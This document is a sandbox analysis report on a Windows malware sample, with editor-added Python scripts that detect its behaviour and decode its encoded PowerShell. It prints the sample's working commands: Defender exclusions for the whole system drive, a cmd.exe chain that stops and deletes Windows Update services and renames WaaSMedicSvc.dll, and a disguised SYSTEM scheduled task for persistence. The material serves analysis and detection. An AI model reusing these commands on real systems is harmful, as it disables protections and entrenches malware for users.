Analysis
- max time kernel: 46s
- max time network: 49s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 17-08-2022 22:16

Static task: static1
Behavioral task: behavioral1
- Sample: 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe
- Resource: win7-20220812-en

General
- Target: 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe
- Size: 1.8MB
- MD5: 6691c3106d5319f108114a48f5177396
- SHA1: 1ce92f03b5e7bd1c1d591141693f6e0261f3afee
- SHA256: 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97
- SHA512: 19860f3c0479d5bbc5a7ccdaf609d68ec2007480cc8ea4becb5c0457ab4aeacdb6e0fa75e7d274436d5825342321bbb9d49468f3e990460b5b85a430c7ebdba7
Malware Config
Signatures

Modifies security service (2 TTPs, 2 IoCs)
Process: reg.exe
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters

Possible privilege escalation attempt (2 IoCs)
Processes: 576 takeown.exe, 772 icacls.exe

Stops running service(s) (3 TTPs)

Modifies file permissions (1 TTPs, 2 IoCs)
Processes: 576 takeown.exe, 772 icacls.exe

Drops file in System32 directory (1 IoCs)
Process: powershell.exe
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Drops file in Program Files directory (2 IoCs)
Process: 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe
- File created: C:\Program Files\Google\Chrome\updater.exe
- File opened for modification: C:\Program Files\Google\Chrome\updater.exe

Launches sc.exe (5 IoCs)
sc.exe is a Windows utility to control services on the system.
Processes: 572 sc.exe, 1924 sc.exe, 1516 sc.exe, 1324 sc.exe, 1588 sc.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature is "likely ransomware behaviour"; note that no file-encryption activity is recorded anywhere else in this report, and the signature fired with no IoCs.

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Modifies registry key (1 TTPs, 9 IoCs)
Processes: 1652 reg.exe, 832 reg.exe, 108 reg.exe, 860 reg.exe, 976 reg.exe, 1636 reg.exe, 1764 reg.exe, 1544 reg.exe, 1012 reg.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes: 1740 powershell.exe, 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
- Token: SeDebugPrivilege, 1740 powershell.exe
- Token: SeDebugPrivilege, 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe
- Token: SeTakeOwnershipPrivilege, 576 takeown.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Parent PID and process, then the child PID and process it wrote to. Every pair below appears three times in the raw report; it is listed once here. The signature caps at 64 records, which is why the final pair (1292 cmd.exe to 1636 reg.exe) has only one record.
- 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe, to 1740 powershell.exe
- 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe, to 1292 cmd.exe
- 1292 cmd.exe, to 572 sc.exe
- 1292 cmd.exe, to 1924 sc.exe
- 1292 cmd.exe, to 1516 sc.exe
- 1292 cmd.exe, to 1324 sc.exe
- 1292 cmd.exe, to 1588 sc.exe
- 1292 cmd.exe, to 1764 reg.exe
- 1292 cmd.exe, to 1652 reg.exe
- 1292 cmd.exe, to 832 reg.exe
- 1292 cmd.exe, to 108 reg.exe
- 1292 cmd.exe, to 1544 reg.exe
- 1292 cmd.exe, to 576 takeown.exe
- 1292 cmd.exe, to 772 icacls.exe
- 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe, to 1304 cmd.exe
- 1680 375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe, to 1700 cmd.exe
- 1304 cmd.exe, to 1952 schtasks.exe
- 1700 cmd.exe, to 1168 schtasks.exe
- 1292 cmd.exe, to 860 reg.exe
- 1292 cmd.exe, to 1012 reg.exe
- 1292 cmd.exe, to 976 reg.exe
- 1292 cmd.exe, to 1636 reg.exe (single record; list truncated at 64 IoCs)
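The signature hits above are the sandbox's own classification of what the sample did. As an added example (the editor's code, not part of this report and not code from the sample), the script below re-derives the same findings from process-creation command lines of the kind Sysmon Event ID 1 or Security event 4688 record, so the behaviour can be hunted on real hosts. Six of the sample lines are copied verbatim from the process tree in this report; the two unflagged lines are constructed benign commands. The rule names, the service list and the rule regexes are this example's own choices, not anything the sandbox publishes. One caveat when reading this run: UsoSvc, WaaSMedicSvc, dosvc and WaaSMedicSvc.dll were introduced with Windows 10 and do not exist on the Windows 7 image used here, so only the wuauserv and bits commands had a real target, which matches the report recording key deletions under wuauserv only.

```python
import re

# Process-creation command lines. The first six are copied verbatim from the
# process tree in this report; the last two are constructed benign commands
# included to show that the rules do not fire on routine administration.
SAMPLE_CMDLINES = [
    "sc stop wuauserv",
    r"reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f",
    r"takeown /f C:\Windows\System32\WaaSMedicSvc.dll",
    r"icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q",
    r"reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f",
    r'schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""',
    "sc query wuauserv",                                   # constructed, benign
    r'schtasks /create /sc daily /tn "Backup" /tr "C:\Windows\System32\wbadmin.exe start backup"',  # constructed, benign
]

# Windows Update related services the sample stops and unregisters (list is
# this example's own; it mirrors the service names in the cmd.exe command line).
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}


def classify(cmdline: str) -> list:
    """Return the names of all rules that match one command line ([] if none)."""
    hits = []
    # sc stop <update service>
    m = re.search(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", cmdline, re.I)
    if m and m.group(1).lower() in UPDATE_SERVICES:
        hits.append("stop_update_service")
    # reg delete of the service's registration key, which prevents it from starting again
    m = re.search(r"\breg(?:\.exe)?\s+delete\s+HKLM\\SYSTEM\\CurrentControlSet\\Services\\(\S+)",
                  cmdline, re.I)
    if m and m.group(1).lower() in UPDATE_SERVICES:
        hits.append("delete_update_service_key")
    # takeown / icacls against the Update Medic service DLL (precedes the rename step)
    if re.search(r"\b(?:takeown|icacls)(?:\.exe)?\b.*\\WaaSMedicSvc\.dll", cmdline, re.I):
        hits.append("tamper_waasmedicsvc_dll")
    # policy keys that switch automatic updates off
    if re.search(r"\breg(?:\.exe)?\s+add\s+HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\b",
                 cmdline, re.I):
        hits.append("set_windowsupdate_policy")
    # a SYSTEM scheduled task whose target binary lives outside the Windows directory
    if (re.search(r"\bschtasks(?:\.exe)?\s+/create\b", cmdline, re.I)
            and re.search(r'/ru\s+"?system"?', cmdline, re.I)):
        t = re.search(r'/tr\s+"?\\?"?([a-z]:\\.*?\.exe)', cmdline, re.I)
        if t and not t.group(1).lower().startswith("c:\\windows\\"):
            hits.append("system_task_outside_windows_dir")
    return hits


def scan(cmdlines) -> list:
    """Return (cmdline, hits) pairs for every line that matched at least one rule."""
    return [(c, h) for c in cmdlines if (h := classify(c))]


def update_tampering_chain(cmdlines) -> bool:
    """True when the same host shows the whole chain seen in this report: an update
    service stopped, its service key deleted, the update policy rewritten and
    WaaSMedicSvc.dll touched. Individual rules are noisier than the combination."""
    seen = {rule for _, hits in scan(cmdlines) for rule in hits}
    return {"stop_update_service", "delete_update_service_key",
            "set_windowsupdate_policy", "tamper_waasmedicsvc_dll"} <= seen


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_CMDLINES):
        print(", ".join(hits), "<-", cmdline)
    print("full update-tampering chain:", update_tampering_chain(SAMPLE_CMDLINES))
```

The per-line rules are deliberately narrow (exact registry paths, a fixed service list) so that each fires on a single command; the correlation in `update_tampering_chain` is where the confidence comes from, because an administrator might legitimately stop wuauserv or set AUOptions, but not delete the service key and change the ACL on WaaSMedicSvc.dll in the same session.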
Processes

- [1] C:\Users\Admin\AppData\Local\Temp\375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe (PID 1680)
  Command line: "C:\Users\Admin\AppData\Local\Temp\375294a3dc682fe2804c58ddbab44a2ae61e39d3c4a02507d937ae6a09334d97.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1740)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAHcAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAcgBkACMAPgA="
    The -EncodedCommand value is base64 over UTF-16LE text and decodes to:
    <#bp#> Add-MpPreference <#ro#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pwkl#> -Force <#srd#>
    The <# ... #> block comments are padding; the effective command is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which adds the user's profile and the entire system drive to the Windows Defender exclusion list.
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  - [2] C:\Windows\System32\cmd.exe (PID 1292)
    Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    This one command line stops and unregisters the Windows Update, Update Orchestrator, Update Medic, BITS and Delivery Optimization services, takes ownership of WaaSMedicSvc.dll and renames it so the Medic service cannot repair the damage, sets policy values that turn automatic updates off, and disables the update-related scheduled tasks. The rename step is a cmd.exe builtin, so it does not appear as a child process below. The & separator means each step runs regardless of whether the previous one succeeded.
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\system32\sc.exe: sc stop UsoSvc
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe: sc stop WaaSMedicSvc
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe: sc stop wuauserv
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe: sc stop bits
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe: sc stop dosvc
      - Launches sc.exe
      (sc.exe PIDs 572, 1924, 1516, 1324, 1588 in launch order, per the WriteProcessMemory records)
    - [3] C:\Windows\system32\reg.exe: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
      - Modifies registry key
    - [3] C:\Windows\system32\reg.exe: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
      - Modifies registry key
    - [3] C:\Windows\system32\reg.exe: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
      - Modifies security service
      - Modifies registry key
    - [3] C:\Windows\system32\reg.exe: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
      - Modifies registry key
    - [3] C:\Windows\system32\reg.exe: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
      - Modifies registry key
      (reg.exe PIDs 1764, 1652, 832, 108, 1544 in launch order, per the WriteProcessMemory records)
    - [3] C:\Windows\system32\takeown.exe (PID 576): takeown /f C:\Windows\System32\WaaSMedicSvc.dll
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\icacls.exe (PID 772): icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
      - Possible privilege escalation attempt
      - Modifies file permissions
    - [3] C:\Windows\system32\reg.exe: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
      - Modifies registry key
    - [3] C:\Windows\system32\reg.exe: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
      - Modifies registry key
    - [3] C:\Windows\system32\reg.exe: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
      - Modifies registry key
    - [3] C:\Windows\system32\reg.exe: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
      - Modifies registry key
      (reg.exe PIDs 860, 1012, 976, 1636 in launch order, per the WriteProcessMemory records)
    - [3] C:\Windows\system32\schtasks.exe: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
    - [3] C:\Windows\system32\schtasks.exe: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
    - [3] C:\Windows\system32\schtasks.exe: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
    - [3] C:\Windows\system32\schtasks.exe: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
    - [3] C:\Windows\system32\schtasks.exe: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
    - [3] C:\Windows\system32\schtasks.exe: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
    - [3] C:\Windows\system32\schtasks.exe: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

  - [2] C:\Windows\System32\cmd.exe (PID 1304)
    Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\system32\schtasks.exe (PID 1952): schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
      - Creates scheduled task(s)
      Persistence: the task runs as SYSTEM with highest privileges at every logon and launches the updater.exe the sample dropped into C:\Program Files\Google\Chrome (see "Drops file in Program Files directory"). The task name imitates the legitimate Google Update task names.

  - [2] C:\Windows\System32\cmd.exe (PID 1700)
    Command line: "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\system32\schtasks.exe (PID 1168): schtasks /run /tn "GoogleUpdateTaskMachineQC"
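The encoded PowerShell command in the process tree above, decoded as an added example. This is the editor's script, not code from the report or from the sample; the base64 string is copied from the powershell.exe command line in this report. `decode_encoded_command` reverses what powershell.exe does with -EncodedCommand (base64 over UTF-16LE), `strip_block_comments` removes the `<# ... #>` block comments the sample interleaves between tokens, and `extract_defender_exclusions` is a convenience helper of this example that pulls out the paths handed to Add-MpPreference -ExclusionPath.

```python
import base64
import re

# -EncodedCommand argument copied verbatim from the powershell.exe command line
# in this report.
ENCODED = (
    "PAAjAGIAcAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAbwAjAD4AIAAt"
    "AEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwA"
    "ZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAHcAawBsACMAPgAgAC0ARgBv"
    "AHIAYwBlACAAPAAjAHMAcgBkACMAPgA="
)

# PowerShell block comment: <# anything, including newlines #>
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)


def decode_encoded_command(b64: str) -> str:
    """powershell.exe -EncodedCommand takes base64 of the script as UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Drop <# ... #> comments used as padding between tokens, then squeeze whitespace
    so the remaining command reads as one line."""
    return " ".join(BLOCK_COMMENT.sub("", script).split())


def extract_defender_exclusions(script: str) -> list:
    """Return the path expressions passed to Add-MpPreference -ExclusionPath, or []
    if the script does not call it. Handles the @(a,b) array form seen here and a
    bare comma list."""
    m = re.search(r"Add-MpPreference\b.*?-ExclusionPath\s+@?\(?([^)]+)\)?", script)
    if not m:
        return []
    return [p.strip() for p in m.group(1).split(",")]


if __name__ == "__main__":
    raw = decode_encoded_command(ENCODED)
    print("decoded :", raw)
    clean = strip_block_comments(raw)
    print("cleaned :", clean)
    print("excluded:", extract_defender_exclusions(clean))
```

The comment padding defeats naive string matching on the decoded text (for instance a rule that looks for "Add-MpPreference -ExclusionPath" as one literal), which is why the cleaning step runs before any keyword check. Excluding $env:SystemDrive from Defender scanning covers the dropped C:\Program Files\Google\Chrome\updater.exe as well as everything else on the drive.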
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/108-72-0x0000000000000000-mapping.dmp
- memory/480-86-0x0000000000000000-mapping.dmp
- memory/572-64-0x0000000000000000-mapping.dmp
- memory/576-74-0x0000000000000000-mapping.dmp
- memory/772-75-0x0000000000000000-mapping.dmp
- memory/832-71-0x0000000000000000-mapping.dmp
- memory/860-80-0x0000000000000000-mapping.dmp
- memory/904-84-0x0000000000000000-mapping.dmp
- memory/976-82-0x0000000000000000-mapping.dmp
- memory/1012-81-0x0000000000000000-mapping.dmp
- memory/1168-79-0x0000000000000000-mapping.dmp
- memory/1204-90-0x0000000000000000-mapping.dmp
- memory/1292-63-0x0000000000000000-mapping.dmp
- memory/1304-76-0x0000000000000000-mapping.dmp
- memory/1312-87-0x0000000000000000-mapping.dmp
- memory/1324-67-0x0000000000000000-mapping.dmp
- memory/1504-88-0x0000000000000000-mapping.dmp
- memory/1516-66-0x0000000000000000-mapping.dmp
- memory/1544-73-0x0000000000000000-mapping.dmp
- memory/1588-68-0x0000000000000000-mapping.dmp
- memory/1620-85-0x0000000000000000-mapping.dmp
- memory/1636-83-0x0000000000000000-mapping.dmp
- memory/1652-70-0x0000000000000000-mapping.dmp
- memory/1680-54-0x000000013F110000-0x000000013F2EE000-memory.dmp (filesize 1.9MB)
- memory/1680-55-0x000007FEFB741000-0x000007FEFB743000-memory.dmp (filesize 8KB)
- memory/1700-77-0x0000000000000000-mapping.dmp
- memory/1712-89-0x0000000000000000-mapping.dmp
- memory/1740-56-0x0000000000000000-mapping.dmp
- memory/1740-59-0x000007FEEC840000-0x000007FEED39D000-memory.dmp (filesize 11.4MB)
- memory/1740-61-0x00000000027A4000-0x00000000027A7000-memory.dmp (filesize 12KB)
- memory/1740-60-0x00000000027A4000-0x00000000027A7000-memory.dmp (filesize 12KB)
- memory/1740-62-0x00000000027AB000-0x00000000027CA000-memory.dmp (filesize 124KB)
- memory/1740-58-0x000007FEED3A0000-0x000007FEEDDC3000-memory.dmp (filesize 10.1MB)
- memory/1764-69-0x0000000000000000-mapping.dmp
- memory/1924-65-0x0000000000000000-mapping.dmp
- memory/1952-78-0x0000000000000000-mapping.dmp